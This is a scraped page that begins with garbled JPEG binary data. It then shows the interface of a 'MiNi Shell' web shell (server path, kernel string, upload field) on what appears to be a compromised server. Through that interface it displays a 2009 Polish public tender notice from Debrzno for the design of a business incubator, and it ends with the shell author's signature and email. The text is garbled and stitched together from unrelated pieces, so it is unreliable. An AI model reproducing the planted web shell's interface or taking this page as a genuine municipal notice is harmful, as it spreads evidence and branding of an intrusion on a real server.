JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090814/133935-N-2009.html

<p class="kh_header"><b>Debrzno: Opracowanie dokumentacji techniczno-wykonawczej Inkubatora Przedsiębiorczości 		wraz z  niezbędną infrastrukturą w Zielonym Parku Przemysłowym w Cierzniach</b><br>
<b>Numer ogłoszenia: 133935 - 2009; data zamieszczenia: 14.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Debrznie , ul. Traugutta 2, 77-310 Debrzno, woj. pomorskie, tel. 059 8335366, faks 059 8335351.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.debrzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji techniczno-wykonawczej Inkubatora Przedsiębiorczości 		wraz z  niezbędną infrastrukturą w Zielonym Parku Przemysłowym w Cierzniach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1. Wykonanie projektu budowlano - wykonawczego dla Inkubatora przedsiębiorczości wraz z niezbędną infrastrukturą (zewnętrzną i wewnętrzną) na terenie działki Nr 498/16 położonej w miejscowości Cierznie gmina Debrzno zgodnie z zasadami współczesnej wiedzy technicznej i normami, obowiązującymi przepisami, w tym, między innymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (tekst jednolity Dz.U. z 2006 r. nr 156, poz.118 z późn. zm.). oraz  zgodnie z Rozporządzeniem Ministra Infrastruktury z dn. 3 lipca 2003r.w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz..U. z 2003 r. Nr 120, poz.1133 ze zm.) oraz  Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 02marca 1999r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U.Nr 43,poz.430).
W zakresie zamówienia ujęto wykonanie pełnobranżowego projektu budowlano - wykonawczego z uzgodnieniami i pozwoleniem na budowę dla :                                                Budynek inkubatora  o powierzchni 1500 m2
wnętrze inkubatora ma się składać z pomieszczeń przeznaczonych dla osób rozpoczynających działalność gospodarczą oraz dla małych przedsiębiorstw 
powierzchnia użytkowa obiektu ma stanowić 85% powierzchni całkowitej, czyli 1275 m2,        z tego 475 m2 ma być przeznaczone na biura, natomiast pozostał pow. 800 m2 na działalność firm produkcyjno-usługowych :
- średnia wielkość pomieszczeń biurowych to ok. 20 m2 (z możliwością łączenia)
- średnia wielkość pomieszczeń produkcyjno-usługowych ok. 100 m2                                  z samodzielnymi wjazdami i wejściami (z możliwością łączenia)
budynek ma być ogrzewany w sposób standardowy z możliwością zastosowania również   odnawialnych źródeł energii np. ciepła woda z paneli słonecznych.
uwzględnienie rozprowadzenia szerokopasmowej sieci Internetu.
	wyposażenie w/w obiektu we wszystkie media wraz z infrastrukturą teleinformatyczną                	      Infrastrukturę zewnętrzną :
- droga o nawierzchni asfaltowej o szerokości 6 m oraz ciąg pieszo-rowerowy o szer. 3 m, na terenie działek Nr- 498/4, 498/14, 498/17 i część działki Nr- 498/10
- sieć wodociągowej,
- sieć kanalizacji sanitarnej,
- oświetlenie zew. dróg i placów,
- sieć kanalizacji deszczowej,
- parkingi
- ogrodzenie
- mała architektura i zieleń urządzona
Przyłącza wodociągowe,kanalizacji sanitarnej,elektryczne i teletechniczne projektować na podstawie odrębnych warunków technicznych administratorów sieci. 
2. Wykonanie koncepcji odwodnienia oraz odprowadzenia wód gruntowych i deszczowych z      terenu Parku Przemysłowego - działki Nr- 498/1, 498/2, 498/3 498/4, 498/5, 498/6, 498/7, 498/8, 498/9, 498/10, 498/11, 498/12, 498/13, 498/14, 498/16, 498/17 i 498/17.

Obszar terenu objęty niniejszym opracowaniem do chwili obecnej użytkowany rolniczo.

Do obowiązków Wykonawcy będzie należało:
Pozyskanie mapy do celów projektowych ,
Przed ostatecznym przystąpieniem do prac projektowych należy przedłożyć do uzgodnienia opracowaną koncepcję architektoniczną minimum w dwóch wariantach pod względem architektonicznym i w części opisowej pod względem konstrukcyjnym
Zaleca się aby Wykonawca dokonał wizji lokalnej miejsca usługi, celem uzyskania informacji, które mogą być konieczne do przygotowania oferty.
W cenie oferty oferent zobowiązany jest ująć wszystkie koszty dokonania wymaganych uzgodnień, uzyskania wszelkich opinii itp. niezbędnych do wykonania kompletnego dzieła
Uzyskanie pozwolenia na budowę i dostarczenia go Zamawiającemu
Zamawiający wymaga, aby Wykonawca przeniósł na Zamawiającego przysługujące mu prawa autorskie wraz z własnością wszystkich egzemplarzy dokumentacji objętych
przedmiotem zamówienia oraz ich wersji elektronicznych. Wykonawca przeniesie na 
Zamawiającego również prawo zezwalające na wykonywanie zależnych praw 
autorskich..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> VIII. Wymagania dotyczące wadium
Oferent przystępując do przetargu zobowiązany jest wnieść wadium w wysokości 10.000,00 zł.

Wadium może być wnoszone w jednej lub kilku następujących formach:
-pieniądzach,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-        kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
         -gwarancjach ubezpieczeniowych
- poręczeniach udzielonych przez podmioty, o których mowa w art. 6b, ust. 5, pkt 2 b) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 z późn. zm.).


Wadium wniesione w formach innych niż pieniądzu musi zawierać zobowiązanie gwaranta lub poręczyciela  z  tytułu  wystąpienia  zdarzeń,  o  których  mowa  w  art.  46  ust.  5  ustawy  Prawo Zamówień Publicznych. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, wadium to musi obejmować zobowiązanie gwaranta lub poręczyciela z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich.

 Informacje dodatkowe o wadium:
1)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego:
Bank Spółdzielczy w Człuchowie O/Debrzno nr  23 9326 0006 0080 0091 2000 0030
z dopiskiem Wadium -przetarg na opracowanie projektu technicznego Inkubator.
2)	Wadium  wnosi  się  przed  upływem  terminu  składania  ofert.  W  przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego Zamawiającego.
3)	W przypadku wniesienia wadium w pozostałych formach, innych niż pieniądz, do oferty należy dołączyć, w osobnej koszulce oryginał dokumentu wadium - nie łączyć go na trwale z ofertą. Dodatkowo należy do oferty dołączyć, potwierdzoną za zgodność z oryginałem, kopię dokumentu wadium.
 Oferta  nie  zabezpieczona  akceptowalną   formą   wadium  zostanie  odrzucona  bez rozpatrywania.
4)	Wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 46 ustawy Prawo zamówień publicznych. W przypadku wadium wniesionego w pieniądzu zwrot nastąpi przelewem na rachunek bankowy wskazany w piśmie przez Wykonawcę, a wniesionego w innej formie - w kasie Zamawiającego.
5)	Zwrot wadium nastąpi, jeśli zaistnieje jedna z poniższych okoliczności:
a)	upłynął termin związania ofertą,
b)	zawarto  umowę  w  sprawie  zamówienia  publicznego  i  wniesiono  zabezpieczenie należytego wykonania tej umowy,
c)	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia,
d)	na wniosek Wykonawcy, jeśli Wykonawca wycofał ofertę przed upływem terminu składania ofert,
e)	na wniosek Wykonawcy, jeśli został on wykluczony z postępowania f)	na wniosek Wykonawcy, jeśli jego oferta została odrzucona.
6)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeśli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów, o których mowa w art.
25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
7)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił  podpisania  umowy  w  sprawie  zamówienia  publicznego  na  warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8)Złożenie  przez  Wykonawcę,  którego  oferta  została  odrzucona  lub  wykluczonego  z postępowania, wniosku o  zwrot  wadium jest  równoznaczne ze  zrzeczeniem się  przez Wykonawcę prawa do wniesienia protestu.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny 	spełniania tych warunków
1. O udzielenie zamówienie mogą ubiegać się wykonawcy spełniający niżej podane warunki:
1)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
  2)  posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 			osobami  zdolnymi do wykonania zamówienia:
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia art. 24 ust1 2.(Pzp)      zał. nr 2
5) prowadzą działalność gospodarczą określoną wpisem do właściwego rejestru lub w zaświadczeniu o wpisie do ewidencji działalności gospodarczej, 
   6)  spełniają wszystkie wymagania określone art. 22 ust. 1 ustawy Pzp (załącznik nr 3)                                        7) posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności    gospodarczej.
2.  Spełniają następujące warunki szczegółowe:
a)  W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie i potencjał techniczny do oferty należy dołączyć następujące dokumenty :
wykaz prac - projektów zrealizowanych przez Wykonawce w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania i tożsamych z przedmiotem zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, wykaz niniejszy powinien obejmować minimum dwa opracowania, na które zostało udzielone pozwolenie na budowę potwierdzone przez Zamawiającego o wartości nie mniejszej niż 200.000,00 zł brutto - Zał. Nr 4.
( Załączone umowy na zrealizowane zadania nie będą traktowane jako dokument potwierdzający należne wykonanie umowy) 
b)  W celu potwierdzenia,  że wykonawca dysponuje osobami zdolnymi ( w stopniu wystarczającym ) do wykonania zamówienia do oferty należy dołączyć wykaz osób, które będą wykonywać zamówienie wraz z danymi na temat ich kwalifikacji, niezbędnych do wykonania zamówienia - Zał. Nr- 5
- co najmniej 1 osobę posiadających uprawnienia  do projektowania o specjalności  architektonicznej, przynależące do właściwej Izby , posiadającą co najmniej 5-letnie doświadczenie zawodowe  w projektowaniu 
- co najmniej  1 osobę posiadające uprawnienia budowlane do projektowania o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń, wodociągowych i kanalizacyjnych, przynależącej do właściwej Izby , posiadającą co najmniej 5-letnie doświadczenie zawodowe w projektowaniu
- co najmniej 1 osobę posiadająca uprawnienia budowlane do projektowania  w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych przynależąca do właściwej Izby , posiadającą co najmniej 5-letnie doświadczenie zawodowe w projektowaniu.
- co najmniej 1 osobę posiadające uprawnienia budowlane do projektowania  w zakresie konstrukcyjno- budowlanej przynależącej do właściwej Izby , posiadającą co najmniej 5-letnie doświadczenie zawodowe w projektowaniu.

- co najmniej 1 osobę posiadające uprawnienia budowlane do projektowania w specjalności drogowej  w zakresie dróg , przynależącej do właściwej Izby , posiadającą co najmniej 5-letnie doświadczenie zawodowe w projektowaniu

- co najmniej 1 osobę posiadające uprawnienia budowlane do projektowania w specjalności budownictwa wodnego , przynależącej do właściwej Izby , posiadającą co najmniej 5-letnie doświadczenie zawodowe w projektowaniu

Dopuszcza się opracowanie  kilku branż przez jednego Projektanta  pod warunkiem posiadania przez niego odpowiednich uprawnień i doświadczenia wymaganego w SIWZ.


2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
Sposób dokonywania oceny w/w warunków będzie odbywał się wg zasady spełnia/nie spełnia na podstawie załączonych do oferty oświadczeń lub dokumentów, których wykaz został określony w pkt V SIWZ składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu.
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
1)wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych,
2)wykonawców, którzy wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji,
3)wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
4)wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art.26 ust. 3 ustawy,	
5)wykonawców, którzy nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
Zamawiający odrzuca ofertę, która:
1)jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,
2)jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
3)zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
4)została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert,
5)zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88, lub błędy w obliczeniu ceny,
6)w terminie 7 dni od dnia otrzymania zawiadomienia wykonawca nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny,
7)jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
1. Dokumenty wymagane:
1)Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ 
2)Oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2 do SIWZ
3)Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych;
4)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
5)Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności załączając uprawnienia i zaświadczenia o przynależności do właściwej izby samorządu zawodowego - załącznik nr 5 do SIWZ. 
6)Wykonawca winien wskazać w ofercie tę część zamówienia, którą zamierza powierzyć podwykonawcom jeżeli dotyczy lub oświadczenie, że wykona zadanie siłami własnymi. Informację o zatrudnieniu podwykonawców - załącznik nr 6 do SIWZ.
7)Zaparafowany wzór umowy -załącznik nr 7 do SIWZ.

2. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
Dokumenty sporządzane w języku obcym są składane wraz z tłumaczeniem na język polski i poświadczone przez wykonawcę.
3. Dokumenty wymagane w przypadku składania oferty wspólnej
1)Pełnomocnictwo wg zasad określonych w dziale XI ust. 2.
2)Oferta winna zawierać dokumenty wymienione w ust. 1 pkt 2 i 4 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie
Wszystkie wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę  osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem. W przypadku pełnomocnictwa oraz umowy konsorcjum wymaga się przedstawienia oryginału lub kserokopii poświadczonej notarialnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.debrzno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto i Gmina Debrzno 
ul. Traugutta 2   77-310 Debrzno


Tel. (059) 83 35 351,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2009 godzina 11:00, miejsce: Urząd Miasta i Gminy w Debrznie, ul. Traugutta 2, 77-310 Debrzno - Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego

Creat By MiNi SheLL
Email: jattceo@gmail.com